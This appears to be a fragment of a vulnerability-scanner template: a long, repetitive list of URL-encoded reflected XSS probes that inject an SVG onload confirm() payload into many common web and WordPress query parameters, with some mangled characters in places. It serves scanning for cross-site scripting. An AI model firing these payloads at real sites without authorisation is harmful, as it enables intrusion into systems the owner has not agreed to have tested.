- "{{BaseURL}}/?activated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-activated%27%29%3E&trigger=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-trigger%27%29%3E&loggedout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-loggedout%27%29%3E&script=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-script%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-query%27%29%3E&file_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-file_name%27%29%3E&fname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fname%27%29%3E&options=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-options%27%29%3E&export=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-export%27%29%3E&post=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-p%27%29%3E&action2=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-action2%27%29%3E&c=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-c%27%29%3E&destination=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-destination%27%29%3E"
|
- "u=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-u%27%29%3E&groups=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-groups%27%29%3E&signup_for=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-signup_for%27%29%3E&user_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_id%27%29%3E&type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-type%27%29%3E&desc=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-desc%27%29%3E&newcontent=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-newcontent%27%29%3E&foo=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-foo%27%29%3E&message=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-message%27%29%3E&d=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-d%27%29%3E&width=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-width%27%29%3E&_wp_http_referer=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_wp_http_referer%27%29%3E&post_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_status%27%29%3E&author=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-author%27%29%3E"
|
||||||
- "{{BaseURL}}/?rememberme=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rememberme%27%29%3E&module=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-module%27%29%3E&comment_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment_ID%27%29%3E&client_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-client_id%27%29%3E&noheader=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-noheader%27%29%3E&del=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-del%27%29%3E&media=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-media%27%29%3E&user_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_name%27%29%3E&country=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-country%27%29%3E&phone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-phone%27%29%3E&sidebar=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sidebar%27%29%3E&version=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-version%27%29%3E&widget_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget_id%27%29%3E&class=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-class%27%29%3E"
|
- "send=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-send%27%29%3E&attachment_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachment_id%27%29%3E&wp_screen_options=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-wp_screen_options%27%29%3E&page_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-page_id%27%29%3E&locale=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-locale%27%29%3E&function=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-function%27%29%3E&profile=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-profile%27%29%3E&day=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-day%27%29%3E&folder=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-folder%27%29%3E&mobile=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mobile%27%29%3E&settings=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-settings%27%29%3E&comments=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comments%27%29%3E&all=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-all%27%29%3E&menu=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu%27%29%3E"
|
||||||
- "{{BaseURL}}/?title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-title%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-view%27%29%3E&context=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-context%27%29%3E&passwd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-passwd%27%29%3E&count=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-count%27%29%3E&delete=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-delete%27%29%3E&test=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-test%27%29%3E&hash=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hash%27%29%3E&csrf_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-csrf_token%27%29%3E&o=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-o%27%29%3E&activate=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-activate%27%29%3E&edit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-edit%27%29%3E&ip=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ip%27%29%3E&r=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-r%27%29%3E"
|
- "uname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-uname%27%29%3E&command=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-command%27%29%3E&reverse=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reverse%27%29%3E&cancel=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cancel%27%29%3E&h=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-h%27%29%3E&logout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-logout%27%29%3E§ion=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-section%27%29%3E&gid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-gid%27%29%3E&input=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-input%27%29%3E&post_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_type%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-page%27%29%3E&updated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-updated%27%29%3E&charset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-charset%27%29%3E&v=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-v%27%29%3E"
|
||||||
- "{{BaseURL}}/?redirect=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-redirect%27%29%3E&linkcheck=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-linkcheck%27%29%3E&port=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-port%27%29%3E&password=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-password%27%29%3E&target=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-target%27%29%3E&method=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-method%27%29%3E¬e=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-note%27%29%3E&amount=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-amount%27%29%3E&set=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-set%27%29%3E&q=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-q%27%29%3E&select=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-select%27%29%3E&cid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cid%27%29%3E&tag=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tag%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-keyword%27%29%3E"
|
- "t=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-t%27%29%3E&comment=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment%27%29%3E&post_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_id%27%29%3E&postid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-postid%27%29%3E&config=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-config%27%29%3E&login=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-login%27%29%3E&paged=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-paged%27%29%3E&go=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-go%27%29%3E&tag_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tag_ID%27%29%3E&user_login=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_login%27%29%3E&part=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-part%27%29%3E&preview_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview_id%27%29%3E&_ajax_nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_ajax_nonce%27%29%3E&widget-id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget-id%27%29%3E"
|
||||||
- "{{BaseURL}}/?edit-menu-item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-edit-menu-item%27%29%3E&error=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-error%27%29%3E&post_title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_title%27%29%3E&x=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-x%27%29%3E&down=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-down%27%29%3E&state=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-state%27%29%3E&data=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-data%27%29%3E&auth=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-auth%27%29%3E&themes=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-themes%27%29%3E&captcha=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-captcha%27%29%3E&nickname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-nickname%27%29%3E&allusers=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-allusers%27%29%3E&color=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-color%27%29%3E&path=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-path%27%29%3E"
|
- "activated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-activated%27%29%3E&trigger=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-trigger%27%29%3E&loggedout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-loggedout%27%29%3E&script=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-script%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-query%27%29%3E&file_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-file_name%27%29%3E&fname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fname%27%29%3E&options=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-options%27%29%3E&export=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-export%27%29%3E&post=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-p%27%29%3E&action2=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-action2%27%29%3E&c=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-c%27%29%3E&destination=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-destination%27%29%3E"
|
||||||
- "{{BaseURL}}/?next=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-next%27%29%3E&preview=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview%27%29%3E&shortcode=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-shortcode%27%29%3E&features=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-features%27%29%3E&mode=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mode%27%29%3E&out_trade_no=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-out_trade_no%27%29%3E&category=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-category%27%29%3E&replytocom=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-replytocom%27%29%3E&from=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-from%27%29%3E&start=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-start%27%29%3E&value=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-value%27%29%3E&range=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-range%27%29%3E&table=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-table%27%29%3E&limit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-limit%27%29%3E"
|
- "rememberme=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rememberme%27%29%3E&module=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-module%27%29%3E&comment_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment_ID%27%29%3E&client_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-client_id%27%29%3E&noheader=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-noheader%27%29%3E&del=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-del%27%29%3E&media=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-media%27%29%3E&user_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_name%27%29%3E&country=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-country%27%29%3E&phone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-phone%27%29%3E&sidebar=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sidebar%27%29%3E&version=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-version%27%29%3E&widget_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget_id%27%29%3E&class=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-class%27%29%3E"
|
||||||
- "{{BaseURL}}/?callback=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-callback%27%29%3E&weblog_title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-weblog_title%27%29%3E&check=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-check%27%29%3E&overwrite=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-overwrite%27%29%3E&prefix=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-prefix%27%29%3E&l=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-l%27%29%3E&token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-token%27%29%3E&start_date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-start_date%27%29%3E&direction=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-direction%27%29%3E&ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ID%27%29%3E&pid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pid%27%29%3E&to=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-to%27%29%3E&checkemail=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-checkemail%27%29%3E&menu-locations=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu-locations%27%29%3E"
|
- "title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-title%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-view%27%29%3E&context=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-context%27%29%3E&passwd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-passwd%27%29%3E&count=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-count%27%29%3E&delete=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-delete%27%29%3E&test=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-test%27%29%3E&hash=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hash%27%29%3E&csrf_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-csrf_token%27%29%3E&o=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-o%27%29%3E&activate=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-activate%27%29%3E&edit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-edit%27%29%3E&ip=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ip%27%29%3E&r=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-r%27%29%3E"
|
||||||
- "{{BaseURL}}/?name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-name%27%29%3E&json=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-json%27%29%3E&id_base=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-id_base%27%29%3E&where=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-where%27%29%3E&request=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-request%27%29%3E¬es=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-notes%27%29%3E&img=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-img%27%29%3E&a=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-a%27%29%3E&menu-item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu-item%27%29%3E&xml=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-xml%27%29%3E&columns=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-columns%27%29%3E&service=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-service%27%29%3E&site_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-site_id%27%29%3E"
|
- "redirect=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-redirect%27%29%3E&linkcheck=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-linkcheck%27%29%3E&port=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-port%27%29%3E&password=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-password%27%29%3E&target=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-target%27%29%3E&method=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-method%27%29%3E¬e=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-note%27%29%3E&amount=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-amount%27%29%3E&set=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-set%27%29%3E&q=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-q%27%29%3E&select=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-select%27%29%3E&cid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cid%27%29%3E&tag=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tag%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-keyword%27%29%3E"
|
||||||
- "{{BaseURL}}/?tags=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tags%27%29%3E&e=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-e%27%29%3E&users=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-users%27%29%3E&format=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-format%27%29%3E&dl=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dl%27%29%3E&position=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-position%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-url%27%29%3E&theme=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-theme%27%29%3E&firstname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-firstname%27%29%3E&fields=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fields%27%29%3E&form=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-form%27%29%3E&level=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-level%27%29%3E&month=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-month%27%29%3E&oauth_verifier=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oauth_verifier%27%29%3E"
|
- "edit-menu-item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-edit-menu-item%27%29%3E&error=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-error%27%29%3E&post_title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_title%27%29%3E&x=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-x%27%29%3E&down=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-down%27%29%3E&state=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-state%27%29%3E&data=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-data%27%29%3E&auth=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-auth%27%29%3E&themes=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-themes%27%29%3E&captcha=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-captcha%27%29%3E&nickname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-nickname%27%29%3E&allusers=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-allusers%27%29%3E&color=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-color%27%29%3E&path=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-path%27%29%3E"
|
||||||
- "{{BaseURL}}/?order_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-order_id%27%29%3E&cookie=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cookie%27%29%3E&debug=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-debug%27%29%3E&m=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-m%27%29%3E&dir=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dir%27%29%3E&new_role=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-new_role%27%29%3E&trashed=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-trashed%27%29%3E&log=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-log%27%29%3E&excerpt=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-excerpt%27%29%3E&settings-updated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-settings-updated%27%29%3E&plugins=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugins%27%29%3E&modify=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-modify%27%29%3E&pwd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pwd%27%29%3E&file=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-file%27%29%3E"
|
- "next=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-next%27%29%3E&preview=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview%27%29%3E&shortcode=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-shortcode%27%29%3E&features=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-features%27%29%3E&mode=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mode%27%29%3E&out_trade_no=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-out_trade_no%27%29%3E&category=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-category%27%29%3E&replytocom=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-replytocom%27%29%3E&from=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-from%27%29%3E&start=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-start%27%29%3E&value=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-value%27%29%3E&range=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-range%27%29%3E&table=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-table%27%29%3E&limit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-limit%27%29%3E"
|
||||||
- "{{BaseURL}}/?i=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-i%27%29%3E&database=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-database%27%29%3E&tax_input=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tax_input%27%29%3E&secret=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-secret%27%29%3E&mod=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mod%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-s%27%29%3E&stage=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-stage%27%29%3E&time=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-time%27%29%3E&new=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-new%27%29%3E&api_key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-api_key%27%29%3E&invalid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-invalid%27%29%3E&db=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db%27%29%3E&upload=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-upload%27%29%3E&tablename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tablename%27%29%3E"
|
- "callback=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-callback%27%29%3E&weblog_title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-weblog_title%27%29%3E&check=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-check%27%29%3E&overwrite=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-overwrite%27%29%3E&prefix=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-prefix%27%29%3E&l=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-l%27%29%3E&token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-token%27%29%3E&start_date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-start_date%27%29%3E&direction=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-direction%27%29%3E&ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ID%27%29%3E&pid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pid%27%29%3E&to=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-to%27%29%3E&checkemail=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-checkemail%27%29%3E&menu-locations=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu-locations%27%29%3E"
|
||||||
- "{{BaseURL}}/?subject=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-subject%27%29%3E&sticky=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sticky%27%29%3E&ns=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ns%27%29%3E&history=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-history%27%29%3E&category_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-category_id%27%29%3E&metakeyselect=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-metakeyselect%27%29%3E©=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-copy%27%29%3E&product_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-product_id%27%29%3E&status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-status%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cat%27%29%3E&list=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-list%27%29%3E&val=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-val%27%29%3E&what=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-what%27%29%3E&group_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-group_id%27%29%3E"
|
- "name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-name%27%29%3E&json=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-json%27%29%3E&id_base=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-id_base%27%29%3E&where=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-where%27%29%3E&request=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-request%27%29%3E¬es=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-notes%27%29%3E&img=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-img%27%29%3E&a=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-a%27%29%3E&menu-item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu-item%27%29%3E&xml=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-xml%27%29%3E&columns=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-columns%27%29%3E&service=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-service%27%29%3E&site_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-site_id%27%29%3E"
|
||||||
